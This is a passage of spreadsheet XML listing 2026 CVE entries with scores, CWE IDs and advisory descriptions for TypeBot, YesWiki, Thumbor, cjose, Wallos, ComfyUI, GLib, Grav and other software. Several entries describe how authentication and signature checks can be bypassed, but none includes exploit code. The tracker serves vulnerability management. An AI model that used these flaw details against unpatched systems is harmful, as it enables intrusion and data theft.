          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47719</t>
        </is>
      </c>
    </row>
    <row r="1724">
      <c r="A1724" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48763</t>
        </is>
      </c>
      <c r="C1724" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1724" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1724" s="5" t="inlineStr"/>
      <c r="F1724" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1724" s="5" t="inlineStr"/>
      <c r="H1724" s="5" t="inlineStr"/>
      <c r="I1724" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1724" s="5" t="inlineStr"/>
      <c r="K1724" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1724" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Versions prior to 3.17.0 expose a deprecated public upload endpoint at `GET /api/v1/typebots/{typebotId}/blocks/{blockId}/storage/upload-url` that accepts an attacker-controlled `filePath` and returns a presigned S3 `PUT` URL for that exact key. Because the endpoint only checks that the referenced typebot is public and that the referenced block is a file input block, an unauthenticated attacker who knows a valid public `typebotId` and `blockId` can request presigned upload URLs for arbitrary objects in the shared bucket, including `private/...` and other tenants' `public/...` paths. Version 3.17.0 fixes this issue.</t>
        </is>
      </c>
      <c r="M1724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48763</t>
        </is>
      </c>
    </row>
    <row r="1725">
      <c r="A1725" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48771</t>
        </is>
      </c>
      <c r="C1725" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1725" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1725" s="5" t="inlineStr"/>
      <c r="F1725" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1725" s="5" t="inlineStr"/>
      <c r="H1725" s="5" t="inlineStr"/>
      <c r="I1725" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1725" s="5" t="inlineStr"/>
      <c r="K1725" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1725" s="5" t="inlineStr">
        <is>
          <t>ishankportfolio is a portfolio website. Prior to version 1.0.1, contact form submissions could potentially be exposed due to improperly secured client-side database configuration and insufficient access control policies. Applications using publicly exposed database credentials or permissive database rules may allow unauthorised users to read, modify, or abuse stored form submission data. This could impact personally identifiable information (PII) submitted through the website contact form, including names, email addresses, phone numbers, and messages. The issue has been patched in version 1.0.1. Users unable to upgrade immediately can reduce risk by disabling public read/write database access, rotating exposed API keys, restricting database policies to authenticated requests only, moving sensitive operations to secure backend/serverless functions, and/or monitoring database activity logs for suspicious access.</t>
        </is>
      </c>
      <c r="M1725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48771</t>
        </is>
      </c>
    </row>
    <row r="1726">
      <c r="A1726" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52767</t>
        </is>
      </c>
      <c r="C1726" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1726" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1726" s="5" t="inlineStr"/>
      <c r="F1726" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1726" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H1726" s="5" t="inlineStr"/>
      <c r="I1726" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1726" s="5" t="inlineStr"/>
      <c r="K1726" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1726" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. From version 4.6.2 to before version 4.6.6, HttpSignatureService::verifySignature() checks the result of PHP's openssl_verify() with a loose boolean negation - if (!openssl_verify(...)) { throw ... }. PHP's openssl_verify has four possible return values: 1, 0, -1, and "false". The -1 row is the bypass: PHP's truthiness rules make -1 a truthy value, so !(-1) === false, the throw is skipped, and the controller proceeds to processActivity(). Any condition that makes OpenSSL's EVP_VerifyFinal() return -1 triggers the bypass. The reachable consequence is the controller silently treats a failed verification as success and processes the attacker's payload. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M1726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52767</t>
        </is>
      </c>
    </row>
    <row r="1727">
      <c r="A1727" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53500</t>
        </is>
      </c>
      <c r="C1727" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1727" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1727" s="5" t="inlineStr"/>
      <c r="F1727" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1727" s="5" t="inlineStr"/>
      <c r="H1727" s="5" t="inlineStr"/>
      <c r="I1727" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1727" s="5" t="inlineStr"/>
      <c r="K1727" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1727" s="5" t="inlineStr">
        <is>
          <t>Thumbor is an open-source photo thumbnail service by globo.com. Prior to 7.8.0, the ALLOWED_SOURCES configuration passes plain strings to re.match() without escaping dots, so a hostname differing at dot positions can match the allowlist. This issue is fixed in 7.8.0.</t>
        </is>
      </c>
      <c r="M1727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53500</t>
        </is>
      </c>
    </row>
    <row r="1728">
      <c r="A1728" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53501</t>
        </is>
      </c>
      <c r="C1728" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1728" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1728" s="5" t="inlineStr"/>
      <c r="F1728" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1728" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1728" s="5" t="inlineStr"/>
      <c r="I1728" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1728" s="5" t="inlineStr"/>
      <c r="K1728" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1728" s="5" t="inlineStr">
        <is>
          <t>Thumbor is an open-source photo thumbnail service by globo.com. Prior to 7.8.0, Thumbor’s HMAC validation can be bypassed due to the use of Python’s .replace() when removing the signature from the URL before validation. Since .replace() removes all occurrences of the substring, an attacker can insert the same signature multiple times in the URL and manipulate the final URL used for validation. This allows crafting URLs where the validated string differs from the actual requested resource, enabling loading images from unintended domains or paths. This issue is fixed in 7.8.0.</t>
        </is>
      </c>
      <c r="M1728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53501</t>
        </is>
      </c>
    </row>
    <row r="1729">
      <c r="A1729" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53761</t>
        </is>
      </c>
      <c r="C1729" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1729" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1729" s="5" t="inlineStr"/>
      <c r="F1729" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1729" s="5" t="inlineStr"/>
      <c r="H1729" s="5" t="inlineStr"/>
      <c r="I1729" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1729" s="5" t="inlineStr"/>
      <c r="K1729" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1729" s="5" t="inlineStr">
        <is>
          <t>Frappe CRM is an open-source customer relationship management tool. Prior to version 1.73.0, there is an authentication bypass vulnerability via logged invitation keys in crm/api. This issue has been patched in version 1.73.0.</t>
        </is>
      </c>
      <c r="M1729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53761</t>
        </is>
      </c>
    </row>
    <row r="1730">
      <c r="A1730" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53938</t>
        </is>
      </c>
      <c r="C1730" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1730" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1730" s="5" t="inlineStr"/>
      <c r="F1730" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1730" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1730" s="5" t="inlineStr"/>
      <c r="I1730" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1730" s="5" t="inlineStr"/>
      <c r="K1730" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L1730" s="5" t="inlineStr">
        <is>
          <t>OpenIDC/cjose is a C library implementing the Javascript Object Signing and Encryption (JOSE). Prior to version 0.6.2.5, cjose's JWE decryption path for the AES Key Wrap key-management algorithms (`alg` = `A128KW`, `A192KW`, `A256KW`) does not validate the length of the attacker-supplied `encrypted_key` (JWE Encrypted Key) before unwrapping it into a fixed-size, heap-allocated Content Encryption Key (CEK) buffer. A remote, unauthenticated attacker who can submit a crafted JWE to an application that decrypts it with an AES-KW symmetric key can trigger an out-of-bounds heap write, corrupting the heap. This leads at minimum to a crash (denial of service) and, depending on the heap layout and allocator, may be leverageable for further memory-corruption impact. `cjose_jwe_import()` / `cjose_jwe_decrypt()` are pre-authentication entry points: they parse and process fully attacker-controlled input. Upgrade to cjose 0.6.2.5 to receive a patch. If upgrading is not immediately possible, reject the AES Key Wrap algorithms (`A128KW`/`A192KW`/`A256KW`) for untrusted JWEs at the application layer.</t>
        </is>
      </c>
      <c r="M1730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53938</t>
        </is>
      </c>
    </row>
    <row r="1731">
      <c r="A1731" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54556</t>
        </is>
      </c>
      <c r="C1731" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1731" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1731" s="5" t="inlineStr"/>
      <c r="F1731" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1731" s="5" t="inlineStr"/>
      <c r="H1731" s="5" t="inlineStr"/>
      <c r="I1731" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1731" s="5" t="inlineStr"/>
      <c r="K1731" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L1731" s="5" t="inlineStr">
        <is>
          <t>Http4s is a Scala interface for HTTP services. Prior to 0.23.35 and 1.0.0-M47, an unauthenticated HTTP/2 peer can cause an out-of-memory denial of service in the Ember backend with HTTP/2 enabled. The Hpack wrapper in ember-core/shared/src/main/scala/org/http4s/ember/core/h2/Hpack.scala concatenates HEADERS and CONTINUATION frame fragments and decodes them into a single List, but maxHeaderSize accounting does not include indexed headers or HPACK per-header overhead. A small compressed header block can therefore expand into a much larger decoded representation that remains in memory for processing. Servers exposed to untrusted HTTP/2 traffic and clients directed to an untrusted HTTP/2 server are affected, and concurrent malicious connections can exhaust the process heap. This issue is fixed in versions 0.23.35 and 1.0.0-M47.</t>
        </is>
      </c>
      <c r="M1731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54556</t>
        </is>
      </c>
    </row>
    <row r="1732">
      <c r="A1732" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54600</t>
        </is>
      </c>
      <c r="C1732" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1732" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1732" s="5" t="inlineStr"/>
      <c r="F1732" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1732" s="5" t="inlineStr"/>
      <c r="H1732" s="5" t="inlineStr"/>
      <c r="I1732" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1732" s="5" t="inlineStr"/>
      <c r="K1732" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1732" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.4, endpoints/db/import.php has no authentication. The only guard is a user-table row count — if zero (fresh/unconfigured install), an unauthenticated attacker can replace the entire database. This issue has been patched in version 4.9.4.</t>
        </is>
      </c>
      <c r="M1732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54600</t>
        </is>
      </c>
    </row>
    <row r="1733">
      <c r="A1733" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55528</t>
        </is>
      </c>
      <c r="C1733" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1733" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1733" s="5" t="inlineStr"/>
      <c r="F1733" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1733" s="5" t="inlineStr"/>
      <c r="H1733" s="5" t="inlineStr"/>
      <c r="I1733" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1733" s="5" t="inlineStr"/>
      <c r="K1733" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="L1733" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, AgentServer exposes ServerConfig.auth_token but AgentServer._create_app does not check it on any route. A remote caller can subscribe, publish, and perform other actions without a valid bearer token or X-Auth-Token even when authentication is configured. This issue is fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="M1733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55528</t>
        </is>
      </c>
    </row>
    <row r="1734">
      <c r="A1734" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55533</t>
        </is>
      </c>
      <c r="C1734" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1734" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1734" s="5" t="inlineStr"/>
      <c r="F1734" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1734" s="5" t="inlineStr"/>
      <c r="H1734" s="5" t="inlineStr"/>
      <c r="I1734" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1734" s="5" t="inlineStr"/>
      <c r="K1734" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="L1734" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, create_auth_middleware() allows requests when auth=api-key lacks PRAISONAI_API_KEY or JWT authentication lacks PRAISONAI_JWT_SECRET. An externally bound Recipe server can therefore accept unauthenticated POST /v1/recipes/run requests despite authentication being enabled. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M1734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55533</t>
        </is>
      </c>
    </row>
    <row r="1735">
      <c r="A1735" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55571</t>
        </is>
      </c>
      <c r="C1735" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1735" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1735" s="5" t="inlineStr"/>
      <c r="F1735" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1735" s="5" t="inlineStr"/>
      <c r="H1735" s="5" t="inlineStr"/>
      <c r="I1735" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1735" s="5" t="inlineStr"/>
      <c r="K1735" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-306</t>
        </is>
      </c>
      <c r="L1735" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to 1.0.4, LiveViewConsumer.handle_mount sends a `{"type":"navigate","to":...}` frame when login_required, permission_required, or a redirecting on_mount hook denies a LiveView mount, but returns without closing the WebSocket or clearing self.view_instance. A browser follows the redirect, but a raw WebSocket client can ignore it and retain the mounted socket. Because LiveViewConsumer.handle_event does not recheck authentication or authorization, the client can send `{"type":"event",...}` frames that invoke @event_handler methods without an authenticated session, including through handle_live_redirect_mount, enabling unauthorized sensitive reads or mutations. This issue is fixed in version 1.0.4.</t>
        </is>
      </c>
      <c r="M1735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55571</t>
        </is>
      </c>
    </row>
    <row r="1736">
      <c r="A1736" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56670</t>
        </is>
      </c>
      <c r="C1736" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1736" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1736" s="5" t="inlineStr"/>
      <c r="F1736" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1736" s="5" t="inlineStr"/>
      <c r="H1736" s="5" t="inlineStr"/>
      <c r="I1736" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1736" s="5" t="inlineStr"/>
      <c r="K1736" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1736" s="5" t="inlineStr">
        <is>
          <t>ComfyUI is a modular diffusion model GUI, api and backend with a graph/nodes interface. Prior to 0.28.0, the /view endpoint served uploaded SVG files inline because image/svg+xml and related XML content types were absent from the dangerous-content-type handling, allowing stored cross-site scripting in the ComfyUI origin. This issue is fixed in version 0.28.0.</t>
        </is>
      </c>
      <c r="M1736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56670</t>
        </is>
      </c>
    </row>
    <row r="1737">
      <c r="A1737" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56672</t>
        </is>
      </c>
      <c r="C1737" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1737" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1737" s="5" t="inlineStr"/>
      <c r="F1737" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1737" s="5" t="inlineStr"/>
      <c r="H1737" s="5" t="inlineStr"/>
      <c r="I1737" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1737" s="5" t="inlineStr"/>
      <c r="K1737" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1737" s="5" t="inlineStr">
        <is>
          <t>ComfyUI is a node-based diffusion model GUI, API, and backend. Prior to 0.28.0, GET /userdata/{file} served user-controlled HTML and SVG files with extension-derived content types, allowing stored cross-site scripting in the ComfyUI origin and access to browser-stored API tokens, settings, workflows, and authenticated-equivalent API calls. The handler used web.FileResponse(path), so an uploaded .html/.svg was served as text/html/image/svg+xml. POST /userdata stores arbitrary request bodies (confined to the user's userdata directory). When a victim navigated to the file URL, the embedded script executed same-origin. The /view endpoint already forced dangerous MIME types to download; that protection had never been applied to /userdata. This issue is fixed in version 0.28.0.</t>
        </is>
      </c>
      <c r="M1737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56672</t>
        </is>
      </c>
    </row>
    <row r="1738">
      <c r="A1738" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58010</t>
        </is>
      </c>
      <c r="C1738" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1738" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1738" s="5" t="inlineStr"/>
      <c r="F1738" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1738" s="5" t="inlineStr"/>
      <c r="H1738" s="5" t="inlineStr">
        <is>
          <t>gnome:glib, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I1738" s="5" t="inlineStr">
        <is>
          <t>2026-06-30</t>
        </is>
      </c>
      <c r="J1738" s="5" t="inlineStr"/>
      <c r="K1738" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L1738" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GLib. An off-by-one error can occur in the gvs_tuple_is_normal function in the glib/gvariant-serialiser.c file when doing an alignment padding check because the bounds check uses &gt; instead of &gt;=, causing an out-of-bounds read of only 1 byte. This issue can cause a minor information disclosure of 1 byte and a denial of service when the out-of-bounds read crosses a page boundary.</t>
        </is>
      </c>
      <c r="M1738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58010</t>
        </is>
      </c>
    </row>
    <row r="1739">
      <c r="A1739" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58012</t>
        </is>
      </c>
      <c r="C1739" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1739" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1739" s="5" t="inlineStr"/>
      <c r="F1739" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1739" s="5" t="inlineStr"/>
      <c r="H1739" s="5" t="inlineStr">
        <is>
          <t>gnome:glib, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I1739" s="5" t="inlineStr">
        <is>
          <t>2026-06-30</t>
        </is>
      </c>
      <c r="J1739" s="5" t="inlineStr"/>
      <c r="K1739" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L1739" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GLib. A buffer over-read can occur in the g_regex_replace function when used with the `G_REGEX_RAW` compile flag and case-change replacement escapes because the string_append function processes matched substrings using UTF-8 functions that assume valid UTF-8 input, even when the string is treated as raw bytes. This vulnerability can cause a minor information disclosure of 1-5 bytes and a denial of service when the buffer over-read crosses a page boundary.</t>
        </is>
      </c>
      <c r="M1739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58012</t>
        </is>
      </c>
    </row>
    <row r="1740">
      <c r="A1740" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58013</t>
        </is>
      </c>
      <c r="C1740" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1740" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1740" s="5" t="inlineStr"/>
      <c r="F1740" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1740" s="5" t="inlineStr"/>
      <c r="H1740" s="5" t="inlineStr">
        <is>
          <t>gnome:glib, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I1740" s="5" t="inlineStr">
        <is>
          <t>2026-06-30</t>
        </is>
      </c>
      <c r="J1740" s="5" t="inlineStr"/>
      <c r="K1740" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L1740" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GLib. A buffer over-read can occur in g_io_channel_read_line_backend() in the giochannel.c file when a custom line terminator with a length greater than one is set, causing memcmp to read past the GString buffer. This vulnerability can cause a minor information disclosure of 7 bytes or a denial of service when the buffer over-read crosses a page boundary.</t>
        </is>
      </c>
      <c r="M1740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58013</t>
        </is>
      </c>
    </row>
    <row r="1741">
      <c r="A1741" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61638</t>
        </is>
      </c>
      <c r="C1741" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1741" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1741" s="5" t="inlineStr"/>
      <c r="F1741" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1741" s="5" t="inlineStr"/>
      <c r="H1741" s="5" t="inlineStr"/>
      <c r="I1741" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1741" s="5" t="inlineStr"/>
      <c r="K1741" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1741" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.6, POST /endpoints/notifications/testemailnotifications.php accepts smtpaddress and smtpport from POST body with zero SSRF validation. PHPMailer connects to attacker-supplied host:port. Every other notification endpoint uses ssrf_helper.php but email was missed. Any authenticated user can probe internal network, cloud metadata. This issue has been patched in version 4.9.6.</t>
        </is>
      </c>
      <c r="M1741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61638</t>
        </is>
      </c>
    </row>
    <row r="1742">
      <c r="A1742" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62673</t>
        </is>
      </c>
      <c r="C1742" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1742" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1742" s="5" t="inlineStr"/>
      <c r="F1742" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1742" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1742" s="5" t="inlineStr"/>
      <c r="I1742" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1742" s="5" t="inlineStr"/>
      <c r="K1742" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L1742" s="5" t="inlineStr">
        <is>
          <t>Grav is a file-based Web platform. Prior to 2.0.4, the Grav .htaccess and webserver-configs/htaccess.txt security rules omit the Apache [NC] flag and therefore compare sensitive directory and file-extension patterns case-sensitively. On a case-insensitive filesystem, an unauthenticated requester can use uppercase directory or extension variants to bypass the rules and retrieve files under user/accounts or user/config, including password hashes and security configuration. This issue is fixed in version 2.0.4.</t>
        </is>
      </c>
      <c r="M1742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62673</t>
        </is>
      </c>
    </row>
    <row r="1743">
      <c r="A1743" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62959</t>
        </is>
      </c>
      <c r="C1743" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1743" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1743" s="5" t="inlineStr"/>
      <c r="F1743" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1743" s="5" t="inlineStr"/>
      <c r="H1743" s="5" t="inlineStr"/>
      <c r="I1743" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
